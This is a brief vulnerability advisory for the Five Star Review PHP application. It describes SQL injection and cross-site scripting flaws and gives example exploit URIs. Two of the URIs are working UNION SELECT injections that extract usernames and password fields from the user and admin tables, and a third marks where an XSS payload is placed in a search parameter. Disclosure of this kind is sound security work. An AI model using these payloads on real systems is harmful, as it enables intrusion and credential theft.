Five Star Review SQL Injection and Cross Site Scripting Vulnerabilities

Five Star Review SQL Injection and Cross Site Scripting Vulnerabilities

An attacker can exploit these issues via a browser. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting victim to follow a malicious URI.

The following example URIs are available:

http://www.example.com/recommend.php?item_id=1'+union+select+0,concat_ws(0x3a,username,passtext),0,concat_ws(0x3a,username,passtext),0,0,0,0,0,0,0+from+review_users+limit+1,1/*

http://www.example.com/recommend.php?item_id=1'+union+select+0,concat_ws(0x3a,username,passtext),0,concat_ws(0x3a,username,passtext),0,0,0,0,0,0,0+from+review_admin/*

http://www.example.com/search/index.php?cmd=search&words= [[ XSS ]] &searchWhere=0&mode=normal